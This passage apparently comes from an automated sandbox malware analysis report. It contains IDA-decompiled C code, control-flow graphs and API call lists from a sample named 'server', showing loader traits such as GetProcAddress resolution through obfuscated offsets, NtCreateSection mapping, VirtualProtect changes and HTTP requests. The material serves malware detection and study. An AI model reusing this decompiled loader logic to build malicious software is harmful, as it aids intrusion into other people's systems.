            • Instruction Fuzzy Hash: B721C076640204BBD711AB64EC09FAE3BB9BB94750F208020F60EE61A1DB709949FF60
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 247 575e40-575e5b 248 575e61-575e7a OpenProcessToken 247->248 249 575efa-575f06 247->249 250 575e7c-575ea7 GetTokenInformation * 2 248->250 251 575ef9 248->251 252 575eef-575ef8 CloseHandle 250->252 253 575ea9-575eb6 call 5733dc 250->253 251->249 252->251 256 575eee 253->256 257 575eb8-575ec9 GetTokenInformation 253->257 256->252 258 575ecb-575ee5 GetSidSubAuthorityCount GetSidSubAuthority 257->258 259 575ee8-575ee9 call 5761da 257->259 258->259 259->256
            APIs
            • OpenProcessToken.ADVAPI32(000000FF,00020008,00000000,00000000), ref: 00575E72
            • GetTokenInformation.KERNELBASE(00000000,00000014,00000001,00000004,?,00000000), ref: 00575E92
            • GetTokenInformation.KERNELBASE(00000000,00000019,00000000,00000000,?), ref: 00575EA2
            • CloseHandle.KERNEL32(00000000), ref: 00575EF2
              • Part of subcall function 005733DC: RtlAllocateHeap.NTDLL(00000000,00000000,0057119A), ref: 005733E8
            • GetTokenInformation.KERNELBASE(00000000,00000019,00000000,?,?,?,?), ref: 00575EC5
            • GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 00575ECD
            • GetSidSubAuthority.ADVAPI32(00000000,?), ref: 00575EDD
            Memory Dump Source
            • Source File: 00000000.00000002.565328806.0000000000571000.00000020.10000000.00040000.00000000.sdmp, Offset: 00571000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_571000_server.jbxd
            Similarity
            • API ID: Token$Information$Authority$AllocateCloseCountHandleHeapOpenProcess
            • String ID:
            • API String ID: 1295030180-0
            • Opcode ID: 58c3eae50a9cae1f0f5346fa2bb032ea866016e8dc6f024cb6d9817d27e13690
            • Instruction ID: ce366ba894001fce63720ef9998e1ddffd48e76d2b0a01b978507d42ecd6b1e5
            • Opcode Fuzzy Hash: 58c3eae50a9cae1f0f5346fa2bb032ea866016e8dc6f024cb6d9817d27e13690
            • Instruction Fuzzy Hash: 252119B5900219BFEB109F94EC48EAEBF79FB44304F0044A5E915A61A1DB719B44FB60
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 261 401202-401214 call 4012e6 264 4012d5 261->264 265 40121a-40124f GetModuleHandleA GetProcAddress 261->265 266 4012dc-4012e3 264->266 267 401251-401265 GetProcAddress 265->267 268 4012cd-4012d3 call 401ba9 265->268 267->268 269 401267-40127b GetProcAddress 267->269 268->266 269->268 271 40127d-401291 GetProcAddress 269->271 271->268 273 401293-4012a7 GetProcAddress 271->273 273->268 274 4012a9-4012ba call 40110b 273->274 276 4012bf-4012c4 274->276 276->268 277 4012c6-4012cb 276->277 277->266
            C-Code - Quality: 100%
            			E00401202(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
            				intOrPtr _v8;
            				_Unknown_base(*)()* _t29;
            				_Unknown_base(*)()* _t33;
            				_Unknown_base(*)()* _t36;
            				_Unknown_base(*)()* _t39;
            				_Unknown_base(*)()* _t42;
            				intOrPtr _t46;
            				struct HINSTANCE__* _t50;
            				intOrPtr _t56;
            
            				_t56 = E004012E6(0x20);
            				if(_t56 == 0) {
            					_v8 = 8;
            				} else {
            					_t50 = GetModuleHandleA( *0x404184 + 0x405099);
            					_v8 = 0x7f;
            					_t29 = GetProcAddress(_t50,  *0x404184 + 0x4051e9);
            					 *(_t56 + 0xc) = _t29;
            					if(_t29 == 0) {
            						L8:
            						E00401BA9(_t56);
            					} else {
            						_t33 = GetProcAddress(_t50,  *0x404184 + 0x4051d1);
            						 *(_t56 + 0x10) = _t33;
            						if(_t33 == 0) {
            							goto L8;
            						} else {
            							_t36 = GetProcAddress(_t50,  *0x404184 + 0x4050cc);
            							 *(_t56 + 0x14) = _t36;
            							if(_t36 == 0) {
            								goto L8;
            							} else {
            								_t39 = GetProcAddress(_t50,  *0x404184 + 0x4050ec);
            								 *(_t56 + 0x18) = _t39;
            								if(_t39 == 0) {
            									goto L8;
            								} else {
            									_t42 = GetProcAddress(_t50,  *0x404184 + 0x405091);
            									 *(_t56 + 0x1c) = _t42;
            									if(_t42 == 0) {
            										goto L8;
            									} else {
            										 *((intOrPtr*)(_t56 + 8)) = _a8;
            										 *((intOrPtr*)(_t56 + 4)) = _a4;
            										_t46 = E0040110B(_t56, _a12); // executed
            										_v8 = _t46;
            										if(_t46 != 0) {
            											goto L8;
            										} else {
            											 *_a16 = _t56;
            										}
            									}
            								}
            							}
            						}
            					}
            				}
            				return _v8;
            			}












            0x00401210
            0x00401214
            0x004012d5
            0x0040121a
            0x00401232
            0x00401241
            0x00401248
            0x0040124a
            0x0040124f
            0x004012cd
            0x004012ce
            0x00401251
            0x0040125e
            0x00401260
            0x00401265
            0x00000000
            0x00401267
            0x00401274
            0x00401276
            0x0040127b
            0x00000000
            0x0040127d
            0x0040128a
            0x0040128c
            0x00401291
            0x00000000
            0x00401293
            0x004012a0
            0x004012a2
            0x004012a7
            0x00000000
            0x004012a9
            0x004012af
            0x004012b5
            0x004012ba
            0x004012bf
            0x004012c4
            0x00000000
            0x004012c6
            0x004012c9
            0x004012c9
            0x004012c4
            0x004012a7
            0x00401291
            0x0040127b
            0x00401265
            0x0040124f
            0x004012e3

            APIs
              • Part of subcall function 004012E6: RtlAllocateHeap.NTDLL(00000000,?,00401A18,00000030,?,00000000), ref: 004012F2
            • GetModuleHandleA.KERNEL32(?,00000020,?,?,?,?,?,00401337,?,?,?,?,?,00000002,?,?), ref: 00401226
            • GetProcAddress.KERNEL32(00000000,?), ref: 00401248
            • GetProcAddress.KERNEL32(00000000,?), ref: 0040125E
            • GetProcAddress.KERNEL32(00000000,?), ref: 00401274
            • GetProcAddress.KERNEL32(00000000,?), ref: 0040128A
            • GetProcAddress.KERNEL32(00000000,?), ref: 004012A0
              • Part of subcall function 0040110B: NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,76684EE0,00000000,00000000,?), ref: 00401168
              • Part of subcall function 0040110B: memset.NTDLL ref: 0040118A
            Memory Dump Source
            • Source File: 00000000.00000002.565231454.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.565231454.0000000000403000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.565231454.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.565231454.0000000000407000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_server.jbxd
            Similarity
            • API ID: AddressProc$AllocateCreateHandleHeapModuleSectionmemset
            • String ID:
            • API String ID: 3012371009-0
            • Opcode ID: ef3fb27e8fef4e2a0636531737cea3558674998f5155fbc55e035b1692bada1c
            • Instruction ID: f32f865edd81f5c961b11f374a2ae16c892bfa44bfba4a474c1bfb8eea8db87f
            • Opcode Fuzzy Hash: ef3fb27e8fef4e2a0636531737cea3558674998f5155fbc55e035b1692bada1c
            • Instruction Fuzzy Hash: 7C210CB4A0060BAFD710DFA9CD4495B77ECEB54314700447AEA09FB261EB74E9008B68
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 304 575364-575373 RtlEnterCriticalSection 305 57537d-575387 304->305 306 575375-575377 Sleep 305->306 307 575389-57538d 305->307 306->305 308 5753a5-5753aa call 5712c6 307->308 309 57538f-575394 307->309 312 5753af-5753c1 RtlLeaveCriticalSection 308->312 309->308 310 575396-575399 309->310 310->308
            APIs
            • RtlEnterCriticalSection.NTDLL(0057A38C), ref: 0057536D
            • Sleep.KERNEL32(0000000A), ref: 00575377
            • HeapFree.KERNEL32(00000000,00000000), ref: 0057539F
            • RtlLeaveCriticalSection.NTDLL(0057A38C), ref: 005753BB
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.565328806.0000000000571000.00000020.10000000.00040000.00000000.sdmp, Offset: 00571000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_571000_server.jbxd
            Similarity
            • API ID: CriticalSection$EnterFreeHeapLeaveSleep
            • String ID: Uhv
            • API String ID: 58946197-4282624479
            • Opcode ID: a295395eeedadcde9a3b7e1f283c52ddbb4e68bbc97254262005d0ada383b8ce
            • Instruction ID: 51268eba0418137ecb5a6b6bba78eafc012a1b67b16af985d25ad1c50b4c17d5
            • Opcode Fuzzy Hash: a295395eeedadcde9a3b7e1f283c52ddbb4e68bbc97254262005d0ada383b8ce
            • Instruction Fuzzy Hash: BBF0DA706106419FEB109F69FC4CF1A7BE4BB64380B149C15B50DC62B1E660D898FA26
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 313 572523-57253d call 574520 316 572553-572561 313->316 317 57253f-57254d 313->317 319 572573-57258e call 573037 316->319 320 572563-572566 316->320 317->316 325 572590-572596 319->325 326 572598 319->326 320->319 321 572568-57256d 320->321 321->319 323 572700 321->323 327 572702-572707 323->327 328 57259e-5725b3 call 574332 call 57415a 325->328 326->328 333 5725b5-5725b8 CloseHandle 328->333 334 5725be-5725c4 328->334 333->334 335 5725c6-5725cb 334->335 336 5725ea-57260c call 5727a0 call 5733dc 334->336 337 5725d1 335->337 338 5726eb-5726f0 335->338 349 57260e-572636 memset RtlInitializeCriticalSection 336->349 350 572638-57263a 336->350 340 5725d4-5725e3 call 5723c4 337->340 341 5726f2-5726f6 338->341 342 5726f8-5726fe 338->342 351 5725e5 340->351 341->327 341->342 342->327 352 57263b-57263f 349->352 350->352 351->338 352->338 353 572645-57265b RtlAllocateHeap 352->353 354 57265d-572689 wsprintfA 353->354 355 57268b-57268d 353->355 356 57268e-572692 354->356 355->356 356->338 357 572694-5726b4 call 573bd3 call 571d8a 356->357 357->338 362 5726b6-5726bd call 576ea3 357->362 365 5726c4-5726cb 362->365 366 5726bf-5726c2 362->366 367 5726e0-5726e4 call 576815 365->367 368 5726cd-5726cf 365->368 366->338 372 5726e9 367->372 368->338 369 5726d1-5726de call 575c31 368->369 369->338 369->367 372->338
            APIs
              • Part of subcall function 00574520: GetModuleHandleA.KERNEL32(?,00000000,0057253B), ref: 0057452F
            • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 005725B8
              • Part of subcall function 005727A0: GetVersionExA.KERNEL32(?,00000042,00000000), ref: 005727C4
              • Part of subcall function 005727A0: wsprintfA.USER32 ref: 00572828
              • Part of subcall function 005733DC: RtlAllocateHeap.NTDLL(00000000,00000000,0057119A), ref: 005733E8
            • memset.NTDLL ref: 00572612
            • RtlInitializeCriticalSection.NTDLL(0057A38C), ref: 00572623
              • Part of subcall function 00575C31: memset.NTDLL ref: 00575C4B
              • Part of subcall function 00575C31: lstrlenW.KERNEL32(00000000,?,00000005,?,00000000), ref: 00575C91
              • Part of subcall function 00575C31: StrCmpNIW.SHLWAPI(00000000,?,00000000), ref: 00575C9C
            • RtlAllocateHeap.NTDLL(00000000,00000043,00000060), ref: 0057264E
            • wsprintfA.USER32 ref: 0057267E
            Memory Dump Source
            • Source File: 00000000.00000002.565328806.0000000000571000.00000020.10000000.00040000.00000000.sdmp, Offset: 00571000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_571000_server.jbxd
            Similarity
            • API ID: AllocateHandleHeapmemsetwsprintf$CloseCriticalInitializeModuleSectionVersionlstrlen
            • String ID:
            • API String ID: 1825273115-0
            • Opcode ID: 2ed5f359b8b756ae736778e2feb0cef3631322d7564fbb217c0e90fa581c6eac
            • Instruction ID: efebc9b7774c3570a5ef88d0973d0e5a494bc8a57aff51aecbe877f25bda8349
            • Opcode Fuzzy Hash: 2ed5f359b8b756ae736778e2feb0cef3631322d7564fbb217c0e90fa581c6eac
            • Instruction Fuzzy Hash: F851D671A00215AFDB21AFB4FC89B6E3FA8BB54710F10C816F50DEB151EB709984BB51
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 374 577040-57706d call 5733dc 377 577073-577079 374->377 378 5771c1-5771c3 374->378 379 57707b-57707f 377->379 380 5771c4-5771ca 378->380 381 5770c7-5770c9 379->381 382 577081-577083 379->382 383 5770d6-5770da 381->383 384 5770cb-5770ce 381->384 385 577085-577087 382->385 386 5770ad-5770af 382->386 392 5771b4 383->392 393 5770e0-5770f8 call 5733dc 383->393 389 5770d3 384->389 390 5770d0 384->390 385->386 391 577089-57708b 385->391 387 5770b1-5770b4 386->387 388 5770be 386->388 394 5770b6 387->394 395 5770b9-5770bc 387->395 396 5770c1-5770c5 388->396 389->383 390->389 398 57708d-57708f 391->398 399 5770aa-5770ab 391->399 397 5771b6 392->397 407 5771b0-5771b2 393->407 408 5770fe-57710e 393->408 394->395 395->388 396->379 396->381 401 5771b7-5771bf call 5761da 397->401 398->383 402 577091-5770a2 398->402 399->396 401->380 405 5770a7-5770a9 402->405 406 5770a4 402->406 405->399 406->405 407->397 410 5771a6-5771ae 408->410 411 577114 408->411 410->401 412 577119-577160 lstrcpy lstrcat 411->412 413 577183-5771a0 lstrlen 412->413 414 577162-577171 lstrcmp 412->414 413->410 413->412 415 577173-57717c 414->415 416 577180 414->416 415->414 417 57717e 415->417 416->413 417->413
            APIs
              • Part of subcall function 005733DC: RtlAllocateHeap.NTDLL(00000000,00000000,0057119A), ref: 005733E8
            • lstrcpy.KERNEL32(?,00000020), ref: 0057713D
            • lstrcat.KERNEL32(?,00000020), ref: 00577152
            • lstrcmp.KERNEL32(00000000,?), ref: 00577169
            • lstrlen.KERNEL32(?), ref: 0057718D
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.565328806.0000000000571000.00000020.10000000.00040000.00000000.sdmp, Offset: 00571000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_571000_server.jbxd
            Similarity
            • API ID: AllocateHeaplstrcatlstrcmplstrcpylstrlen
            • String ID:
            • API String ID: 3214092121-3916222277
            • Opcode ID: 76510a0563d5cf086d345402c94db2665a171851a0b9c6ea801ca06b2840cd95
            • Instruction ID: 701c6b1c8117218d0c97dd40c67be200170f2420de32d3ebe4db6ffe28b5377c
            • Opcode Fuzzy Hash: 76510a0563d5cf086d345402c94db2665a171851a0b9c6ea801ca06b2840cd95
            • Instruction Fuzzy Hash: 1F51AF31A0421CEBDF20CF99E8886ADBFB6FF59314F15C05AE8199B211C7709A51EF90
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            C-Code - Quality: 100%
            			_entry_() {
            				void* _t1;
            				int _t4;
            				int _t6;
            
            				_t6 = 0;
            				_t1 = HeapCreate(0, 0x400000, 0); // executed
            				 *0x404160 = _t1;
            				if(_t1 != 0) {
            					 *0x404170 = GetModuleHandleA(0);
            					GetCommandLineW(); // executed
            					_t4 = E004019F1(); // executed
            					_t6 = _t4;
            					HeapDestroy( *0x404160);
            				}
            				ExitProcess(_t6);
            			}






            0x00401de2
            0x00401deb
            0x00401df1
            0x00401df8
            0x00401e01
            0x00401e06
            0x00401e0c
            0x00401e17
            0x00401e19
            0x00401e19
            0x00401e20

            APIs
            • HeapCreate.KERNEL32(00000000,00400000,00000000), ref: 00401DEB
            • GetModuleHandleA.KERNEL32(00000000), ref: 00401DFB
            • GetCommandLineW.KERNEL32 ref: 00401E06
              • Part of subcall function 004019F1: NtQuerySystemInformation.NTDLL ref: 00401A26
              • Part of subcall function 004019F1: Sleep.KERNEL32(00000000,00000000,00000030,?,00000000), ref: 00401A6D
              • Part of subcall function 004019F1: GetLocaleInfoA.KERNEL32(00000400,0000005A,?,00000004,?,00000000), ref: 00401A95
              • Part of subcall function 004019F1: GetSystemDefaultUILanguage.KERNEL32(?,00000000), ref: 00401A9F
              • Part of subcall function 004019F1: VerLanguageNameA.KERNEL32(?,?,00000004,?,00000000), ref: 00401AB2
              • Part of subcall function 004019F1: GetLongPathNameW.KERNEL32(?,00000000,00000000), ref: 00401ADF
              • Part of subcall function 004019F1: GetLongPathNameW.KERNEL32(?,00000000,00000000), ref: 00401AFD
            • HeapDestroy.KERNEL32 ref: 00401E19
            • ExitProcess.KERNEL32 ref: 00401E20
            Memory Dump Source
            • Source File: 00000000.00000002.565231454.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.565231454.0000000000403000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.565231454.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.565231454.0000000000407000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_server.jbxd
            Similarity
            • API ID: Name$HeapLanguageLongPathSystem$CommandCreateDefaultDestroyExitHandleInfoInformationLineLocaleModuleProcessQuerySleep
            • String ID:
            • API String ID: 1863574965-0
            • Opcode ID: 3f0d5e8033645e4078616d0e82c2d440b95647ac6ba795ba13239d20948eddaa
            • Instruction ID: 5d9c3f05f0f46dd7afa9dd855db83e90556071015df760abc973ca805bcb04d9
            • Opcode Fuzzy Hash: 3f0d5e8033645e4078616d0e82c2d440b95647ac6ba795ba13239d20948eddaa
            • Instruction Fuzzy Hash: 0BE0B6B1403220ABC7116F71BE0CA4F7E28BB89B527000539FA05F2279CB384A41CADC
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • HttpSendRequestA.WININET(?,00000000,000000FF,00000000,00000000), ref: 00575224
              • Part of subcall function 00572058: lstrlen.KERNEL32(?), ref: 00572064
              • Part of subcall function 00572058: memcpy.NTDLL(00000000,?,?,?,00000001,00000001), ref: 005720C2
              • Part of subcall function 00572058: lstrcpy.KERNEL32(00000000,?), ref: 005720D2
            • SetEvent.KERNEL32(?), ref: 0057523D
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.565328806.0000000000571000.00000020.10000000.00040000.00000000.sdmp, Offset: 00571000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_571000_server.jbxd
            Similarity
            • API ID: EventHttpRequestSendlstrcpylstrlenmemcpy
            • String ID: @MhvNhv
            • API String ID: 2298518793-713089056
            • Opcode ID: 9954d2ec6c3d6cae219180bbbdc1f248c66427a9f3d0d70145528c59ca80ae1c
            • Instruction ID: bfe8f4a54535313c43f30bcebd13a132f681d11869ba3e509d9e77f7fe771b04
            • Opcode Fuzzy Hash: 9954d2ec6c3d6cae219180bbbdc1f248c66427a9f3d0d70145528c59ca80ae1c
            • Instruction Fuzzy Hash: 56014B35114A01AADB316B61FC48F1B7BA9BFA8365F108A25F599910E1E760EC48FA21
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 87%
            			E004014CF(void* __eax, void* _a4) {
            				signed int _v8;
            				signed int _v12;
            				signed int _v16;
            				long _v20;
            				int _t42;
            				long _t53;
            				intOrPtr _t56;
            				void* _t57;
            				signed int _t59;
            
            				_v12 = _v12 & 0x00000000;
            				_t56 =  *0x404180;
            				_t57 = ( *(__eax + 0x14) & 0x0000ffff) + __eax + 0x18;
            				_v16 =  *(__eax + 6) & 0x0000ffff;
            				VirtualProtect(_a4,  *(__eax + 0x54), _t56 - 0x43175abf,  &_v20); // executed
            				_v8 = _v8 & 0x00000000;
            				if(_v16 <= 0) {
            					L12:
            					return _v12;
            				} else {
            					goto L1;
            				}
            				while(1) {
            					L1:
            					_t59 = _v12;
            					if(_t59 != 0) {
            						goto L12;
            					}
            					asm("bt [esi+0x24], eax");
            					if(_t59 >= 0) {
            						asm("bt [esi+0x24], eax");
            						if(__eflags >= 0) {
            							L8:
            							_t53 = _t56 - 0x43175abf;
            							L9:
            							_t42 = VirtualProtect( *((intOrPtr*)(_t57 + 0xc)) + _a4,  *(_t57 + 8), _t53,  &_v20); // executed
            							if(_t42 == 0) {
            								_v12 = GetLastError();
            							}
            							_t57 = _t57 + (_t56 - 0x3175ac2) * 0x28;
            							_v8 = _v8 + 1;
            							if(_v8 < _v16) {
            								continue;
            							} else {
            								goto L12;
            							}
            						}
            						asm("bt [esi+0x24], eax");
            						_t53 = _t56 - 0x43175ac1;
            						if(__eflags >= 0) {
            							goto L9;
            						}
            						goto L8;
            					}
            					asm("bt [esi+0x24], eax");
            					if(_t59 >= 0) {
            						_t53 = _t56 - 0x43175aa3;
            					} else {
            						_t53 = _t56 - 0x43175a83;
            					}
            					goto L9;
            				}
            				goto L12;
            			}












            0x004014d9
            0x004014e6
            0x004014ec
            0x004014f8
            0x00401508
            0x0040150a
            0x00401512
            0x004015a6
            0x004015ad
            0x00000000
            0x00000000
            0x00000000
            0x00401518
            0x00401518
            0x00401518
            0x0040151c
            0x00000000
            0x00000000
            0x00401528
            0x0040152c
            0x00401550
            0x00401554
            0x00401568
            0x00401568
            0x0040156e
            0x0040157d
            0x00401581
            0x00401589
            0x00401589
            0x00401595
            0x00401597
            0x004015a0
            0x00000000
            0x00000000
            0x00000000
            0x00000000
            0x004015a0
            0x0040155c
            0x00401560
            0x00401566
            0x00000000
            0x00000000
            0x00000000
            0x00401566
            0x00401534
            0x00401538
            0x00401542
            0x0040153a
            0x0040153a
            0x0040153a
            0x00000000
            0x00401538
            0x00000000

            APIs
            • VirtualProtect.KERNEL32(00000000,?,?,?,?,?,00000000,?,?), ref: 00401508
            • VirtualProtect.KERNEL32(00000000,?,?,?), ref: 0040157D
            • GetLastError.KERNEL32 ref: 00401583
            Memory Dump Source
            • Source File: 00000000.00000002.565231454.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.565231454.0000000000403000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.565231454.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.565231454.0000000000407000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_server.jbxd
            Similarity
            • API ID: ProtectVirtual$ErrorLast
            • String ID:
            • API String ID: 1469625949-0
            • Opcode ID: fa1f72f039ba5afec073a1f2adf273f2725f5d9d4501c0cfce72b6ba3d5ab017
            • Instruction ID: db8870d9979c58085381c8b0541bfb0d1fdb36fbc34c572f0fe0e58abbf4653c
            • Opcode Fuzzy Hash: fa1f72f039ba5afec073a1f2adf273f2725f5d9d4501c0cfce72b6ba3d5ab017
            • Instruction Fuzzy Hash: D1212B7280121AEFCB14CF95C9819AAF7B4FF58305F04487AE413AB960E738AA55CF58
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • SwitchToThread.KERNEL32 ref: 0057214F
            • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 0057215B
              • Part of subcall function 00576269: memcpy.NTDLL(00000000,00000002,?,?,?,00000000,00000000), ref: 00576308
            • Sleep.KERNEL32(00000003,00000000,00000000,?,00000013,00000000), ref: 00572193
            Memory Dump Source
            • Source File: 00000000.00000002.565328806.0000000000571000.00000020.10000000.00040000.00000000.sdmp, Offset: 00571000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_571000_server.jbxd
            Similarity
            • API ID: Time$FileSleepSwitchSystemThreadmemcpy
            • String ID:
            • API String ID: 2829178182-0
            • Opcode ID: 41401295f37affd41d393dcaca6c3484511daf78f4c3c26324d330e8c26c47b9
            • Instruction ID: 6b6e44d6dd6cba0da35a5745d0ac6e405cc166a76908d3fd14fe2719b128b31a
            • Opcode Fuzzy Hash: 41401295f37affd41d393dcaca6c3484511daf78f4c3c26324d330e8c26c47b9
            • Instruction Fuzzy Hash: 4DF0C877B502047BD7149BA4EC1EFDF7AB9EBC4361F110124F605E7340E9B4AA45D6A0
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • ___initmbctable.LIBCMT ref: 0040F57F
              • Part of subcall function 00410330: __setmbcp.LIBCMT ref: 0041033B
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.565263957.000000000040F000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040F000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_40f000_server.jbxd
            Similarity
            • API ID: ___initmbctable__setmbcp
            • String ID:
            • API String ID: 2112888233-3916222277
            • Opcode ID: f2b7ec6be90ee06b1e9be17d203c461aba3adf1a0972734bdb40a9e67c86efcf
            • Instruction ID: c7a70f349540231ab45edc07bb192c1e22f7988e999f8e33b638238a72cad34d
            • Opcode Fuzzy Hash: f2b7ec6be90ee06b1e9be17d203c461aba3adf1a0972734bdb40a9e67c86efcf
            • Instruction Fuzzy Hash: C6411572808201AFEB354F2498047577BA5EB55328F24493FE480A36E1E77E4C4AC75D
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • StrToIntExW.SHLWAPI(?,00000000,?,?,?,00AF5FB8,00000000,?,00579038,00000000,0057905C), ref: 005752A0
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.565328806.0000000000571000.00000020.10000000.00040000.00000000.sdmp, Offset: 00571000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_571000_server.jbxd
            Similarity
            • API ID:
            • String ID: Uhv
            • API String ID: 0-4282624479
            • Opcode ID: f6e63d9ecb79f5fc8d4d0e8aaea44c343e412712bc964642aaac3b089770baed
            • Instruction ID: 400b6e36048718306c5e0f0cf45b813244bd2848d82bb1c65dcb1cf490ec878c
            • Opcode Fuzzy Hash: f6e63d9ecb79f5fc8d4d0e8aaea44c343e412712bc964642aaac3b089770baed
            • Instruction Fuzzy Hash: 49318035900519AFEB119FA1FC89EAE3BBCFB44740F144495B50C97121EBB05E48FB50
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • RtlFreeHeap.NTDLL(00000000,00000000,005711EA,?,00000000,00000001), ref: 005761E6
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.565328806.0000000000571000.00000020.10000000.00040000.00000000.sdmp, Offset: 00571000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_571000_server.jbxd
            Similarity
            • API ID: FreeHeap
            • String ID: Uhv
            • API String ID: 3298025750-4282624479
            • Opcode ID: 327c388b3c1230377a81463c9d952797c0eb58751403721cc51f615a0f5b825e
            • Instruction ID: bdb4573997962ba9a9f437ad3ae05f3fbc877a2c5e6102772968a52601b483aa
            • Opcode Fuzzy Hash: 327c388b3c1230377a81463c9d952797c0eb58751403721cc51f615a0f5b825e
            • Instruction Fuzzy Hash: A9B01275150200ABCB114B00FE08F0D7A21A7B0701F004010B30C00071863204A4FB26
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • SysFreeString.OLEAUT32(00000000), ref: 0057440D
            • SysFreeString.OLEAUT32(00000000), ref: 0057441B
            Memory Dump Source
            • Source File: 00000000.00000002.565328806.0000000000571000.00000020.10000000.00040000.00000000.sdmp, Offset: 00571000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_571000_server.jbxd
            Similarity
            • API ID: FreeString
            • String ID:
            • API String ID: 3341692771-0
            • Opcode ID: 2c25a818871e1e2fcc6f2253cd6966986b94c5eb1c6710ba68369dc73b75fdd9
            • Instruction ID: c4b97b904df2f041310c33054dc3db59a9612cabf84fb15458515ca3fa5eff5d
            • Opcode Fuzzy Hash: 2c25a818871e1e2fcc6f2253cd6966986b94c5eb1c6710ba68369dc73b75fdd9
            • Instruction Fuzzy Hash: DE31FF75910209EFCF05DF98E8C49AE7BB5FF58341B20882EF50A97250D7309985EF61
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
              • Part of subcall function 00575815: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,0057668E,?,00000000,00000000,?,0057A134,00573ECE), ref: 0057587C
              • Part of subcall function 005733DC: RtlAllocateHeap.NTDLL(00000000,00000000,0057119A), ref: 005733E8
            • lstrcat.KERNEL32(00000000,00000000), ref: 005766CA
              • Part of subcall function 00575063: lstrlen.KERNEL32(00000000,00000000,00573ECE,00000000,?,005766D9,00000000,00573ECE,?,0057A134,00573ECE,00000000,0057A3CC), ref: 00575074
              • Part of subcall function 005761DA: RtlFreeHeap.NTDLL(00000000,00000000,005711EA,?,00000000,00000001), ref: 005761E6
            • StrTrimA.SHLWAPI(00000000,0057927C,00000000,00000000,00573ECE,?,0057A134,00573ECE,00000000,0057A3CC), ref: 005766E7
              • Part of subcall function 00574AC7: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,005766F3,00000000,?,0057A134,00573ECE,00000000,0057A3CC), ref: 00574AD1
              • Part of subcall function 00574AC7: _snprintf.NTDLL ref: 00574B2F
            Memory Dump Source
            • Source File: 00000000.00000002.565328806.0000000000571000.00000020.10000000.00040000.00000000.sdmp, Offset: 00571000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_571000_server.jbxd
            Similarity
            • API ID: lstrlen$Heap$AllocateFreeTrim_snprintflstrcat
            • String ID:
            • API String ID: 1279665018-0
            • Opcode ID: 25c6e4c2aa33f826d4b58d69924fe9c899906599fe7b8fae73eb78100d30c670
            • Instruction ID: fdc5eca69acac9c9008eb73e78a9e867a4eaf6cd5b06252ee7c446d6bb5f04db
            • Opcode Fuzzy Hash: 25c6e4c2aa33f826d4b58d69924fe9c899906599fe7b8fae73eb78100d30c670
            • Instruction Fuzzy Hash: 1C11C13291093A678616BB78BC8DC6E3EADFEC47643048015F90CA7202DF74CD06B7A1
            Uniqueness

